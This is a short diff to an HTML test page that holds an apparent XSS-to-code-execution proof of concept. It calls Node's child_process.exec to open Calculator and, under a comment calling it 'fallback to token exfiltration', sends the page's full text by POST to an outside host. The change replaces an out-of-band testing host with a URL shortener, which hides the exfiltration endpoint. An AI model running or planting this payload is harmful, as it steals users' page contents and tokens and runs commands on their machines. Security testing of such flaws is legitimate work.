--- a/test_rc.html
+++ b/test_rc.html
@@ -57,7 +57,7 @@ webkitRequestFileSystem(PERSISTENT, 1024 * 1024, function(fs) {
             require('child_process').exec('open -a Calculator');
           } catch (e) {
             // fallback to token exfiltration
-            fetch('https://your-oast.com/xss', {
+            fetch('https://tinyurl.com/yz885dsu/xss', {
               method: 'POST',
               body: document.body.innerText
             });
